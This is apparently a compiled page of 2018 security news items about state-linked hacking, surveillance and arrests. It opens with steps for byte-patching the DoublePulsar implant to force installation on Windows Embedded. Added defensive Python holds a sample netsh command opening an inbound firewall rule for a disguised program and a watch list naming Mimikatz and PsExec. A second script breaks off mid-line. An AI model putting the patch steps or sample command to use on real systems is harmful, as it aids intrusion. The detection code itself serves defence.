DoublePulsar was designed to check the Windows version on the target machine and take one installation path on Windows 7 or another (and perform other OS checks) on other platform iterations. However, there was no check for Windows Embedded, which generated an error message.

By simply modifying an instruction in the “Windows 7 OS Check,” the researcher was able to force the implant into taking that specific installation path.

“To do this, I went to Edit > Patch program > Change byte. Then I changed the value 74 (opcode of JZ) to 75 (opcode of JNZ). I then created a DIF file by going to File > Produce file > Create DIF file,” Capt. Meelo explains.

Using a script from a security enthusiast who calls himself StalkR, he then patched the modified .exe file and then moved the modified Doublepulsar-1.3.1.exe back to its original location. This resulted in a successful injection of the generated DLL payload to the target host.

North Korean Hackers Exploit HWP Docs in Recent Cyber Heists
26.6.18 securityweek  BigBrothers

A series of malicious Hangul Word Processor (HWP) documents used in recent attacks on cryptocurrency exchanges have been attributed to the North Korea-linked Lazarus group, AlienVault reports.

The attacks appear to include the recent assault on Bithumb, the largest virtual currency exchange in South Korea, with more than 1 million customers. As part of the incident, hackers managed to steal over $30 million worth of cryptocurrencies.

Lazarus, or BlueNoroff, is a state-sponsored hacking group believed to have launched the $81 million cyber heist from the Bangladesh Bank in 2016 and considered the most serious threat against banks. Earlier this year, the group was observed hitting an online casino in Central America and switching interest to crypto-currency.

Earlier this month, AlienVault revealed that Lazarus has been leveraging a new ActiveX vulnerability in attacks on South Korean targets. Now, the security firm says that the hackers have also been using a series of malicious documents to target members of a recent G20 Financial Meeting.

AlienVault's security researchers analyzed three similar malicious documents that have been already associated with Lazarus. One of these mentions the G20 International Financial Architecture Working Group meeting, seeking coordination of the economic policies between the wealthiest countries.

The HWP files include malicious code that fetches next stage malware (either a 32 or 64 bit version of Manuscrypt, which has been already detailed by other security researchers), a threat communicated by impersonating South Korean forum software. Decoy documents of resumes were also included.

A series of reports within South Korea have already suggested that malicious HWP files were used earlier in May and June to set up the Bithumb heist, and that these documents appear linked to previous attacks by Lazarus.

The investigation of a South Korean security company into the thefts also revealed that fake resumes strikingly similar to those delivering the Lazarus-linked Manuscrypt were sent to cryptocurrency organizations.

“Whilst we can’t be certain this malware is responsible for the thefts from Bithumb, it seems a likely suspect,” AlienVault notes.

Related malicious HWP documents from Lazarus have been reportedly targeting crypto-currency users in South Korea earlier this month.

Furthermore, the researchers noticed cryptocurrency phishing domains registered to the same phone number as a domain (itaddnet[.]com) and delivering some of the malware. This would suggest the attackers are also phishing for credentials, in addition to delivering malware.

“It is unusual to see Lazarus registering domains - normally they prefer to compromise legitimate websites. So this would be an unusual attack if it is indeed run by members of Lazarus,” AlienVault says.

Apparently, it would be entirely possible for Lazarus to have hacked Bithumb earlier this month, considering that the group raided the exchange last year as well, which likely provided them with the necessary knowledge to do it again. Over the past year, the group targeted other crypto-currency exchanges as well.

“It’s clear that the thefts from Lazarus won’t stop anytime soon given the gains available - the (partially successful) attempt to steal $1 billion dollars from the Bank of Bangladesh represents 3% of North Korea’s reported GDP. Thefts from South Korean organizations have the double impact of weakening their closest competitor,” AlienVault said.

UK Tax Agency HMRC has recorded the voice tracks of 5.1 Million Brits
25.6.18 securityaffairs BigBrothers

The UK-based privacy group Big Brother Watch revealed that the British tax agency HMRC has recorded the voice of over 5.1 million Britons.
The UK-based privacy and civil liberties group Big Brother Watch has revealed that the British tax agency HMRC (Her Majesty’s Revenue and Customs) has recorded the voice of over 5.1 million Britons.

HMRC collected these voice records via its Voice ID service, launched in January 2017, which lets UK citizens authenticate by voice when calling HMRC call centres.

When the service was launched, the tax agency claimed users would be able to opt out and continue to authenticate themselves using the usual methods.

Big Brother Watch discovered that there is no opt-out option when users call the agency's support line.

Every citizen who calls the service has a voice track recorded for use with the Voice ID authentication feature.

“Far from ‘encouraging’ customers, HMRC offers no choice but to do as the automated system instructs and create a biometric voice ID for a Government database,” reads the Big Brother Watch report.

“In our investigation, we found that the only way to avoid creating a voice ID is to say “no” to the system – three times – before the system resolves to create your voice ID “next time”.”

Big Brother Watch advocates claim HMRC is breaking the law because it provides no clear way to opt out and no way to ask the agency to remove a voice track from its database.

Big Brother Watch filed freedom of information (FOIA) requests, but the tax agency refused to provide users with instructions on how to delete their voice tracks from HMRC's database.

Another aspect still under investigation is how the agency manages the voice tracks and whether it shares them with third parties and other government agencies.

It is clear that HMRC is not in compliance with the GDPR, the regulation adopted by EU member states.

Big Brother Watch officials are inviting Britons to file complaints with HMRC and with the UK's Information Commissioner's Office (ICO); the latter has already started an official investigation into HMRC's process.

Supreme Court of the US ruled that police need a warrant for mobile location data
24.6.18 securityaffairs BigBrothers

The Supreme Court of the US ruled that police must obtain a search warrant before obtaining mobile location data from mobile carriers and similar services.
The Supreme Court of the United States ruled this week that law enforcement must obtain a search warrant before obtaining cell phone location information from mobile carriers or third-party services.

“When the government tracks the location of a cell phone it achieves near perfect surveillance, as if it had attached an ankle monitor to the phone’s user,” Chief Justice John Roberts wrote in the 5-4 opinion, as reported by The Wall Street Journal.

“Unlike the nosy neighbor who keeps an eye on comings and goings,” he wrote, the signal towers and processing centers that track cellphone users “are ever alert, and their memory is nearly infallible,” making the analog-era precedents prosecutors cited to justify such warrantless searches all but obsolete.

The decision aims at preventing surveillance activities operated by the government and protecting the privacy of the citizens under the Fourth Amendment.

The Supreme Court ruled that a warrant is also needed to access location data stored by mobile carriers and similar companies; such data makes it possible to monitor almost any activity of a citizen.

“While individuals regularly leave their vehicles, they compulsively carry cell phones with them all the time. A cell phone faithfully follows its owner beyond public thoroughfares and into private residences, doctor’s offices, political headquarters, and other potentially revealing locales.” continues Chief Justice John Roberts.

“Critically, because location information is continually logged for all of the 400 million devices in the United States – not just those belonging to persons who might happen to come under investigation – this newfound tracking capacity runs against everyone.”

Of course, the authorities can still act without a warrant when citizens' lives are in danger or when national security is at stake.

The ruling stems from the Timothy Carpenter v. US case, filed in 2011, when US police arrested members of a gang that had committed armed robberies at several stores.

Gang members confessed that the group was led by Timothy Carpenter, a claim the police verified by obtaining a court order for Carpenter's cell phone location information, which placed the suspect near the robberies.

Carpenter was sentenced to more than 100 years in prison, but the American Civil Liberties Union lawyers who represented him at the high court called the decision “a truly historic vindication of privacy rights.”

The lawyers argued that a court order should not have been enough to obtain the suspect's mobile location data; a search warrant should have been obtained instead.

The Supreme Court ruling was praised by privacy advocates because it aims to defend citizens' privacy against any abuse.

China-Linked 'Thrip' Spies Target Satellite, Defense Companies
20.6.18 securityweek BigBrothers

A China-linked cyber espionage group has breached the systems of satellite operators, telecommunications companies and defense contractors in the United States and Southeast Asia, Symantec reported on Tuesday.

Symantec has been tracking the threat actor, which it has named “Thrip,” since 2013. However, the security firm says the group’s activities have not been made public until now.

Thrip has used a combination of custom malware and legitimate tools in its attacks. One victim was a satellite communications operator, where the hackers targeted devices involved in operations, as well as systems running software designed for monitoring and controlling satellites.

“This suggests to us that Thrip’s motives go beyond spying and may also include disruption,” Symantec researchers said.

Thrip has also targeted a company specializing in geospatial imaging and mapping. The attackers attempted to gain access to machines hosting MapXtreme GIS, Google Earth Server and Garmin imaging software.

The list of victims identified by Symantec also includes three telecoms firms in Southeast Asia. The companies themselves appear to have been Thrip’s targets rather than their customers. Another victim is a defense contractor, but no details have been shared by the security firm on this attack.

Symantec has been monitoring Thrip since 2013, when it spotted a campaign conducted from systems located in China. The group initially relied mostly on custom malware, but more recent campaigns, which started last year, also involved legitimate tools.

The pieces of malware used by the group include Trojan.Rikamanu, a trojan designed for stealing credentials and other information from compromised systems, and Infostealer.Catchamas, an evolution of Rikamanu that includes improved data theft and anti-detection capabilities.

Thrip has also been spotted using Trojan.Mycicil, a keylogger offered on Chinese underground marketplaces but which has not been seen often, and Backdoor.Spedear and Trojan.Syndicasec, both of which have been observed in the group’s older campaigns.

As for the legitimate tools used by the cyberspies, the list includes the Windows SysInternals utility PSExec, PowerShell, the post-exploitation tool Mimikatz, the open source FTP client WinSCP, and the LogMeIn remote access software.

“This is likely espionage,” said Greg Clark, CEO of Symantec. “The Thrip group has been working since 2013 and their latest campaign uses standard operating system tools, so targeted organizations won’t notice their presence. They operate very quietly, blending in to networks, and are only discovered using artificial intelligence that can identify and flag their movements. Alarmingly, the group seems keenly interested in telecom, satellite operators, and defense companies. We stand ready to work with appropriate authorities to address this serious threat.”

Ex-CIA Employee Charged With Leaking Agency's Hacking Tools
19.6.18 securityweek BigBrothers

A former employee of the U.S. Central Intelligence Agency (CIA) has been charged with stealing classified national defense information from the agency and sharing it with WikiLeaks.

The Department of Justice announced on Monday that Joshua Adam Schulte, 29, of New York, New York, had been charged in a 13-count indictment. The indictment does not specifically name WikiLeaks, but the media revealed last month that authorities had been preparing to charge Schulte for providing WikiLeaks the CIA hacking tools that were published by the whistleblower organization as part of its Vault 7 leak.

Schulte worked for the NSA for five months in 2010 as a systems engineer. He then joined the CIA, where he worked as a software engineer until November 2016, when he moved to New York City and started working as a software engineer for Bloomberg.

The man reportedly became the main suspect for the Vault 7 leaks one week after WikiLeaks started releasing files. However, when investigators searched his apartment and devices, they uncovered a file sharing server hosting child pornography.

Schulte was charged on three counts of receipt, possession and transportation of child pornography in August 2017 and was released the following month. He was arrested again in December for violating the conditions of his release and he has been in custody ever since.

Schulte has now been charged with illegal gathering of national defense information; illegal transmission of lawfully possessed national defense information; illegal transmission of unlawfully possessed national defense information; unauthorized access to a computer to obtain classified information; theft of Government property; unauthorized access of a computer to obtain information from a Department or Agency of the United States; and causing transmission of a harmful computer program, information, code, or command.

The list of charges also includes making material false statements to representatives of the FBI; obstruction of justice; receipt of child pornography; possession of child pornography; transportation of child pornography; and copyright infringement. If convicted, the man could spend decades behind bars.

The hacking-related charges involve Schulte’s activities inside the CIA’s networks while being employed by the agency.

"Joshua Schulte, a former employee of the CIA, allegedly used his access at the agency to transmit classified material to an outside organization,” said Geoffrey S. Berman, US Attorney for the Southern District of New York. “During the course of this investigation, federal agents also discovered alleged child pornography in Schulte’s New York City residence. We and our law enforcement partners are committed to protecting national security information and ensuring that those trusted to handle it honor their important responsibilities. Unlawful disclosure of classified intelligence can pose a grave threat to our national security, potentially endangering the safety of Americans.”

Schulte previously pleaded not guilty to the child pornography-related charges, claiming that up to 100 people had access to the server storing illegal content. Investigators, on the other hand, claim they have proof Schulte had been aware of the presence of the files.

As for leaking CIA hacking tools, Schulte told the press last month that the FBI likely suspected him due to the fact that he had left the CIA on poor terms just months before the Vault 7 leak started.

In Trump Rebuke, US Senate Votes to Reimpose Ban on China's ZTE
19.6.18 securityweek  BigBrothers

The US Senate defied President Donald Trump by voting Monday to overrule his administration's deal with Chinese telecom firm ZTE and reimpose a ban on high-tech chip sales to the company.

Senators added an amendment targeting ZTE into a sweeping, must-pass national defense spending bill that cleared the chamber on an 85-10 vote.

The company has been on life support ever since Washington said it had banned US companies from selling crucial hardware and software components to ZTE for seven years, after staffers violated trade sanctions against Iran and North Korea.

It was fined $1.2 billion for those violations, but earlier this month the Trump administration gave ZTE a lifeline by easing sanctions in exchange for a further $1.4 billion penalty on the company.

The Senate measure nullifies that action, proposing an outright ban on the government buying products and services from ZTE and another Chinese telecoms firm, Huawei.

"We're heartened that both parties made it clear that protecting American jobs and national security must come first when making deals with countries like China, which has a history of having little regard for either," a bipartisan group of senators said.

Hong Kong-listed shares in ZTE plunged more than 20 percent soon after the opening bell on Tuesday. The company has lost around 60 percent of its value since it resumed trading last week after a two-month suspension that followed the initial ban. The lawmakers who introduced the amendment include top Democrat Chuck Schumer and Republican Marco Rubio.

Providing $716 billion in funding for national defense for fiscal year 2019 and giving policy guidance to the Pentagon, the bill is not a done deal.

The House of Representatives passed its own version of the measure, and the two chambers must now hash out a compromise.

"It is vital that our colleagues in the House keep this bipartisan provision in the bill as it heads towards a conference," Schumer and Rubio said.

ZTE, which employs 80,000 people, said recently that its major operations had "ceased" after the ban, raising the possibility of its collapse.

Its fiberoptic networks depend on US components and its cheap smartphones sold en masse abroad are powered by US chips and the Android operating system.

DHS, FBI Share Details of North Korea's 'Typeframe' Malware
18.6.18 securityweek  BigBrothers

The U.S. Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) have published another report on the US-CERT website detailing a piece of malware allegedly used by the North Korean government.

A dozen reports have been published by the DHS and the FBI over the past year on the North Korea-linked threat group tracked by the U.S. government as Hidden Cobra. The list of tools detailed by the agencies includes Sharpknot, Hardrain, Badcall, Bankshot, Fallchil, Volgmer, and Delta Charlie.

The latest report describes a piece of malware dubbed “Typeframe” and it covers a total of 11 samples related to the threat, including executable files and malicious Word documents containing VBA macros.

“These files have the capability to download and install malware, install proxy and Remote Access Trojans (RATs), connect to command and control (C2) servers to receive additional instructions, and modify the victim's firewall to allow incoming connections,” the agencies said.

The alert contains indicators of compromise (IoCs) for each of the files, including a description of their functionality, hashes, IPs, antivirus detections, metadata, and YARA rules.

The goal of the report is to “enable network defense and reduce exposure to North Korean government malicious cyber activity.” However, security experts argued in the past that these types of alerts from government agencies are actually not enough to help improve defenses.

The previous Hidden Cobra report, published on the US-CERT website in late May, attributed the Joanap backdoor trojan and the Brambul worm to the North Korean government.

While it has always denied accusations, experts say North Korea continues to be highly active in cyberspace, with some claiming that the country is even more aggressive than China. Recent attacks attributed to North Korea involved new malware and even zero-day vulnerabilities.

Cyber Attack Aims to Manipulate Mexican Election
18.6.18 securityweek   BigBrothers

On Wednesday June 13, in the run-up to Mexico's July 1 presidential election, a website operated by the rightist National Action Party (PAN) was taken off-line for several hours by a DDoS attack. The outage occurred at the time of a televised presidential debate, and just following a point at which the PAN candidate held up a placard with the website address claiming it held proof of potential corruption.

PAN secretary Damian Zepeda later suggested that front-running leftist candidate Andres Manuel Lopez Obrador (AMLO) was behind the attack. "The AMLO bots have been activated to try to crash the page debate18.mx where there are proofs of contracts worth millions given to AMLO's friend," Zepeda wrote on Twitter.

PAN later claimed that the site had been hit by 185,000 visits in 15 minutes, "with the attacks coming mainly from Russia and China." Lopez Obrador denied any involvement in the attack, and laughed off any suggestion of ties with Russia by calling himself 'Andres Manuelovich'.

The source of the DDoS attack is unknown and possibly unknowable -- but it is a reminder of the extent to which the internet can be used to influence or even control public opinion.

The accusations of Russian involvement in both the Trump election in the U.S. and the UK Brexit referendum are still fresh. Perhaps more directly relevant is the controversy over the DDoS attack on the FCC website just as it was gathering public comment on the (then) proposed elimination of the net neutrality rules.

The FCC claimed it had been taken off-line by a DDoS attack. Critics of the FCC plans have suggested it was purposely taken off-line to avoid registering mass public dissent over the FCC rules. If the Mexico event was a direct parallel to these claims, it could suggest that PAN couldn't prove the criticisms it was making, and took down the website itself.

This last possibility is not a serious proposal -- but it illustrates the plausible deniability and difficulty of attribution that comes with cyber activity. The DDoS attack could have been delivered by Russia (because it has a history of interference); by AMLO (to prevent access to his competitor's website); by the U.S. (because it would almost certainly prefer a right-leaning to a left-leaning neighbor); or by PAN itself (as a false flag). Or, of course, none of the above -- a straightforward DDoS attack by cybercriminals.

At this stage, the only thing that is certain is that a DDoS attack did take place in Mexico. Netscout Arbor's analysis of the period shows more than 300 attacks per day in Mexico during the period 12th-13th June -- which is 50% higher than the normal frequency in the country. The largest volumetric DDoS attack targeting Mexico during the week was more than 200 Gbps.

"Political websites are frequent targets of DDoS attacks not only due to the ease of launching attacks, but also due to the desire and capabilities of attackers to impact the election process while staying undiscovered," comments Kirill Kasavchenko, principal security technologist at Netscout Arbor. "Due to the nature of modern DDoS attacks, it is quite easy to launch attacks from third countries utilizing computers and IoT devices infected by malware or using techniques like reflection of DDoS traffic. Tracing down the original source of the attack and the people behind it is problematic not only from a technical, but also from an administrative point of view."

DHS, FBI published a joint alert including technical details of Hidden Cobra-linked ‘Typeframe’ Malware
18.6.18 securityaffairs BigBrothers

The US DHS and the FBI have published a new joint report that includes technical details of a piece of malware allegedly used by the Hidden Cobra APT.
A new joint report published by the US DHS and FBI has made the headlines; the document details TTPs associated with North Korea-linked threat groups, tracked by the US government as Hidden Cobra.

The US authorities have published the report to reduce the exposure to the activities of North Korea-linked APT groups.

Hidden Cobra’s arsenal includes Sharpknot, Hardrain, Badcall, Bankshot, Fallchil, Volgmer, and Delta Charlie.

The latest joint report includes a piece of malware dubbed “Typeframe” and it covers a total of 11 samples analyzed by the government experts.

The researchers analyzed several executables and weaponized Word documents containing VBA macros.

“DHS and FBI identified Trojan malware variants used by the North Korean government. This malware variant is known as TYPEFRAME. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA.” reads the joint report.

“This malware report contains analysis of 11 malware samples consisting of 32-bit and 64-bit Windows executable files and a malicious Microsoft Word document that contains Visual Basic for Applications (VBA) macros. These files have the capability to download and install malware, install proxy and Remote Access Trojans (RATs), connect to command and control (C2) servers to receive additional instructions, and modify the victim’s firewall to allow incoming connections.”

The security alert includes indicators of compromise (IoCs) for each of the samples analyzed by the experts.

The report includes a description of the functionality for each sample, hashes, IPs, antivirus detections, metadata, and YARA rules.

In May, US authorities published another report on the Hidden Cobra detailing the Joanap backdoor trojan and the Brambul worm.

The only certainty is that North Korea continues to be one of the most aggressive and persistent threat actors in cyberspace.
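The two DHS/FBI reports above describe Typeframe samples that, among other things, modify the victim's firewall to allow incoming connections, and the Thrip write-up earlier on this page notes that the group hides behind legitimate administrative tools such as PsExec and Mimikatz. The Python script below is an added example, not code from either report or from Symantec: it runs two simple detection checks over constructed process-creation records (the record shape, host names, user names, paths and command lines are all made up for this illustration), flagging `netsh advfirewall firewall add rule` invocations that open inbound access and executions of dual-use tools. The log pipeline feeding such records and the exact tool list are assumptions, not something the reports specify.

```python
import re
from dataclasses import dataclass

# Constructed process-creation events in the shape of a Sysmon/4688-style
# record. Hosts, users, paths and command lines are invented for this example;
# none of them come from the DHS/FBI or Symantec reports.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "CORP\\alice", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
    {"host": "ws01", "user": "CORP\\alice", "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": 'netsh advfirewall firewall add rule name="Windows Update Helper" dir=in '
                'action=allow program="C:\\Users\\Public\\wuhelper.exe" enable=yes'},
    {"host": "srv02", "user": "CORP\\svc_admin", "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": 'netsh advfirewall firewall add rule name="Block Telnet" dir=in action=block '
                'protocol=TCP localport=23'},
    {"host": "srv02", "user": "CORP\\svc_admin", "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh advfirewall show allprofiles"},
    {"host": "ws07", "user": "CORP\\bob", "image": r"C:\Tools\PsExec.exe",
     "cmdline": r"PsExec.exe \\srv02 -s cmd.exe"},
    {"host": "ws07", "user": "CORP\\bob", "image": r"C:\Users\bob\Downloads\mimikatz.exe",
     "cmdline": "mimikatz.exe"},
]

# Dual-use tools named in the Thrip write-up (assumed watch list, extend as needed).
DUAL_USE_TOOLS = {"psexec.exe", "psexec64.exe", "mimikatz.exe", "winscp.exe"}

NETSH_ADD_RULE = re.compile(r"\badvfirewall\s+firewall\s+add\s+rule\b", re.IGNORECASE)
# key=value parameters of netsh; the value is either a double-quoted string or a bare token
KV_PAIR = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


@dataclass(frozen=True)
class Finding:
    category: str
    host: str
    user: str
    detail: str


def parse_netsh_rule(cmdline):
    """Return the key=value parameters of a `netsh advfirewall firewall add rule`
    command with lower-cased keys, or None if the command is not an add-rule call."""
    if not NETSH_ADD_RULE.search(cmdline):
        return None
    return {k.lower(): (quoted or bare) for k, quoted, bare in KV_PAIR.findall(cmdline)}


def check_firewall_rule(event):
    """Flag firewall rules that allow inbound traffic (the behaviour attributed to Typeframe)."""
    params = parse_netsh_rule(event["cmdline"])
    if params is None:
        return None
    if params.get("dir", "").lower() == "in" and params.get("action", "").lower() == "allow":
        target = params.get("program") or "port " + params.get("localport", "?")
        return Finding("firewall_inbound_allow", event["host"], event["user"],
                       f'rule "{params.get("name", "?")}" opens inbound access for {target}')
    return None


def check_dual_use_tool(event):
    """Flag execution of administrative tools that Thrip-style intrusions blend in with."""
    image_name = event["image"].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if image_name in DUAL_USE_TOOLS:
        return Finding("dual_use_tool", event["host"], event["user"],
                       f"{image_name} executed: {event['cmdline']}")
    return None


def scan_process_events(events):
    """Run every check over every event and return the findings in event order."""
    findings = []
    for event in events:
        for check in (check_firewall_rule, check_dual_use_tool):
            finding = check(event)
            if finding is not None:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_process_events(SAMPLE_EVENTS):
        print(f"[{f.category}] {f.host} {f.user}: {f.detail}")
```

The blocking rule on `srv02` is deliberately left unflagged: the signal is not "someone touched the firewall" but "an inbound allow rule appeared", which is what turns a host into a reachable listener. In a real pipeline the dual-use check would be paired with context (who ran the tool, from which path, whether it is part of an approved admin workflow), since PsExec and WinSCP are legitimate on many networks.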

Europol dismantled the Rex Mundi hacker crew, it arrested another member of the gang
16.6.18 securityaffairs BigBrothers

Europol announced that several French nationals were arrested in the past year on suspicion of being involved with the notorious Rex Mundi crime gang.
Another Europol success has made the headlines: the European police agency announced that several French nationals were arrested in the past year on suspicion of being involved with the notorious hacker group known as Rex Mundi (“King of the World”).

The Rex Mundi crime group has been active since at least 2012; it hacked into the systems of several organizations worldwide and attempted to blackmail them.

The list of the victims is long and includes AmeriCash Advance, Webassur, Drake International, Buy Way, Hoststar, Websolutions.it, Numericable, Habeas, AlfaNet, Domino’s Pizza, and the Swiss bank Banque Cantonale de Geneve (BCGE).

The hackers stole sensitive information from their victims, then demanded fees for not disclosing the stolen data.

The operation coordinated by Europol was launched in May 2017 after the group targeted a UK-based company. The crooks stole significant amounts of customer data from the company, then attempted to blackmail it by demanding a bitcoin ransom of nearly €580,000 ($670,000) for not disclosing the incident. The group also requested more than €825,000 ($776,000) for details on the hack.

The hackers also demanded an additional €210,000 ($240,000) from the victim for each day the payment was delayed.

“A 25-year-old coder was arrested on 18 May by the Royal Thai Police based on a French international arrest warrant. The arrest of this young cybercriminal was the eighth in an international operation supported by Europol and the Joint Cybercrime Action Taskforce (J-CAT) that started exactly one year ago.” reads the announcement published by Europol.

“In May 2017 a British-based company was the victim of a cyber-attack during which a large amount of customer data was compromised. The attack was immediately claimed by an organisation called Rex Mundi.”

After the victim reported the incident to the authorities, the UK’s Metropolitan Police, the French National Police and Europol launched a joint operation that led to the identification of a French national.

“Within an hour, Europol’s 24/7 Operational Centre was able to link the available information to a French national,” Europol continues.

In June 2017, the authorities identified and arrested five suspects; two more were arrested in October 2017 and one on May 18, 2018.

All of the suspects are French nationals and they were all arrested by French police, except for the last arrest, which took place in Thailand.

The last member of the crew is a 25-year-old developer who was arrested last month by the Royal Thai Police.

The leader of the Rex Mundi group admitted blackmailing the company but claimed to have hired hackers on the Dark Web to hack the victims.

Singapore was hit by an unprecedented number of attacks during the Trump-Kim Summit
16.6.18 securityaffairs BigBrothers

Researchers observed a spike in the number of cyber-attacks targeting Singapore during the Trump-Kim Summit, from June 11 to June 12.
Researchers at F5 Labs have observed a spike in the number of cyber-attacks targeting Singapore from June 11 to June 12, in the wake of the meeting between U.S. President Donald Trump and North Korean President Kim Jong-un in a Singapore hotel.

Experts remarked that Singapore is typically not a top attack destination, and the spike in the number of attacks coincides with the Trump-Kim meeting.

Most of the attacks originated from Russia (88% of overall attacks) and, frankly speaking, I’m not surprised given the importance of the Trump-Kim summit.

According to F5 Labs and Loryka, 97% of all the attacks that originated from Russia from June 11 to June 12 targeted Singapore.

“From June 11 to June 12, 2018, F5 Labs, in concert with our data partner, Loryka, found that cyber-attacks targeting Singapore skyrocketed, 88% of which originated from Russia. What’s more, 97% of all attacks coming from Russia during this time period targeted Singapore.” reads the analysis published by F5 Labs. “We cannot prove they were nation-state sponsored attacks, however the attacks coincide with the day President Donald Trump met with North Korean President Kim Jong-un in a Singapore hotel.”

The cyber attacks hit almost every kind of computer system, from VoIP phones to IoT devices. The attacks began out of Brazil, targeting SIP port 5060, which IP phones use and on which communications are transmitted in clear text.

After an initial attack that lasted for a couple of hours, researchers observed reconnaissance activity originating from a Russian IP address owned by ASN 49505, operated by Selectel; the scans targeted a variety of ports.

None of the attacks attempted to spread malware.

“The number two attacked port was Telnet, consistent with IoT device attacks that could be leveraged to gain access to or listen in on targets of interest.” continues the analysis.

“Other ports attacked include the SQL database port 1433, web traffic ports 81 and 8080, port 7541, which was used by Mirai and Annie to target ISP-managed routers, and port 8291, which was targeted by Hajime to PDoS MikroTik routers.”

Singapore was hit by 40,000 attacks in just 21 hours, starting at 11:00 p.m. on June 11 through 8:00 p.m. June 12, local time.

The experts highlighted that only 8% were exploit attacks, while 92% were reconnaissance scans for potential targets.

Thirty-four percent of the attacks originated from Russia; the list of top attackers also includes China, the US, France, and Italy.

During the summit time frame, Singapore was the top destination of cyber-attacks, receiving 4.5 times more attacks than countries like the U.S. and Canada.

SIP port 5060 was targeted 25 times more than Telnet port 23; the attackers were attempting to gain access to insecure communication systems or VoIP servers, and to compromise IoT devices in order to spy on communications.

“We do not have evidence directly tying this attacking activity to nation-state-sponsored attacks, however it is common knowledge that the Russian government has many contractors within Russia doing their bidding, and that a successful attack on a target of interest would make its way through to the Kremlin,” F5 Labs concludes.

Trump-Kim Summit Attracts Wave of Cyber-Attacks on Singapore
16.6.18 securityweek BigBrothers

The number of cyber-attacks targeting Singapore skyrocketed from June 11 to June 12, during the meeting between U.S. President Donald Trump and North Korean President Kim Jong-un in a Singapore hotel, and most of these attacks originated from Russia, F5 Labs reports.

Russia has long been said to keep the United States under a continuous barrage of cyber-attacks, and even attracted a series of sanctions following the hacking aimed at the 2016 presidential election, which was supposedly the doing of state-sponsored Russian threat actors.

Thus, it’s no wonder the Trump-Kim summit earlier this week was targeted as well, but the number of assaults coming from Russia is indeed impressive: 88% of the total number of observed cyber-attacks came from this country. Furthermore, 97% of all the attacks that originated from Russia during the timeframe targeted Singapore, data from F5 Labs and Loryka reveals.

“We cannot prove they were nation-state sponsored attacks, however the attacks coincide with the day President Donald Trump met with North Korean President Kim Jong-un in a Singapore hotel. The attacks targeted VoIP phones and IoT devices, which appears to be more than a mere coincidence,” F5 says.

The flurry of attacks, the security firm reveals, started out of Brazil by targeting port SIP 5060, the single most attacked port in the timeframe. IP phones use this port to send and receive communications in clear text.

This initial phase, which lasted for only a couple of hours, was followed by reconnaissance scans from the Russian IP address – an IP owned by ASN 49505, operated by Selectel – targeting a variety of ports.

The attacks observed on June 11 and June 12 also targeted the Telnet port, which is normally assaulted in Internet of Things (IoT) incidents. Other targeted ports include SQL database port 1433, web traffic ports 81 and 8080, port 7541 (used by Mirai and Annie to target ISP-managed routers), and port 8291 (previously targeted by Hajime).

During a period of 21 hours, starting at 11:00 p.m. on June 11 through 8:00 p.m. June 12, local time, a total of 40,000 attacks were launched on Singapore. Of these, 92% were reconnaissance scans looking for vulnerable devices, while the remaining 8% were exploit attacks.

“Thirty-four percent of the attacks originated from Russian IP addresses. China, US, France, and Italy round out the top 5 attackers in this period, all of which launched between 2.5 to 3 times fewer attacks than Russia. Brazil, in the sixth position, was the only other country we detected launching SIP attacks alongside Russia,” F5 reveals.

During the period, Singapore became the top destination of cyber-attacks by a large margin, receiving 4.5 times more attacks than the U.S. or Canada. Typically, Singapore is not a top attack destination, and the anomaly coincides with President Trump’s meeting with Kim Jong-un.

While Russia was the main source of attacks, accounting for 88% of them, Brazil was the second largest attacker, launching 8% of the assaults. Germany rounded out the top three attackers, with 2%.

The security researchers also note that there was no attempt made to conceal the attacks launched from Russia and that none of the attacks originating from this country carried malware.

The SIP port 5060 received 25 times more attacks than Telnet port 23, which was the second most targeted. Although attacks on port 5060 are unusual, chances are that the attackers were attempting to gain access to insecure phones or perhaps the VoIP server. The attacks on Telnet were likely trying to compromise IoT devices to spy on communications and collect data.

“We do not have evidence directly tying this attacking activity to nation-state-sponsored attacks, however it is common knowledge that the Russian government has many contractors within Russia doing their bidding, and that a successful attack on a target of interest would make its way through to the Kremlin,” F5 concludes.
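The F5 Labs analysis that both Singapore write-ups above summarize boils down to counting events by source country, destination port and recon-versus-exploit type, then comparing the volume against what is normal for the target. The Python below is an added example (not F5's or Loryka's code or data) that performs that aggregation over a handful of constructed log lines: the line format, the `kind=` recon/exploit label, the country tags and the documentation (TEST-NET) IP addresses are all invented for the illustration, and the 1.5x spike factor is an assumption taken from the "50% higher than normal" framing used elsewhere on this page.

```python
import re
from collections import Counter
from datetime import datetime

# Constructed sensor log. Timestamps are Singapore local time (UTC+8); source
# addresses are RFC 5737 documentation ranges and the cc= country tags are
# invented. One line is deliberately malformed to exercise the parser.
SAMPLE_LOG = """\
2018-06-11T23:02:10+08:00 src=203.0.113.10 cc=RU dport=5060 proto=udp kind=recon
2018-06-11T23:02:11+08:00 src=203.0.113.10 cc=RU dport=5060 proto=udp kind=recon
2018-06-11T23:02:12+08:00 src=203.0.113.11 cc=RU dport=5060 proto=udp kind=recon
2018-06-11T23:05:40+08:00 src=203.0.113.11 cc=RU dport=5060 proto=udp kind=exploit
2018-06-11T23:07:03+08:00 src=203.0.113.12 cc=RU dport=23 proto=tcp kind=recon
2018-06-11T23:09:15+08:00 src=198.51.100.20 cc=BR dport=5060 proto=udp kind=recon
2018-06-11T23:12:48+08:00 src=198.51.100.21 cc=BR dport=5060 proto=udp kind=recon
2018-06-12T00:31:09+08:00 src=192.0.2.30 cc=CN dport=1433 proto=tcp kind=recon
2018-06-12T01:15:22+08:00 src=192.0.2.31 cc=CN dport=8080 proto=tcp kind=exploit
2018-06-12T02:40:00+08:00 src=203.0.113.13 cc=RU dport=8291 proto=tcp kind=recon
this line is garbage and must be skipped by the parser
2018-06-12T03:10:44+08:00 src=203.0.113.14 cc=DE dport=7541 proto=tcp kind=recon
"""

LINE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) cc=(?P<cc>[A-Z]{2}) "
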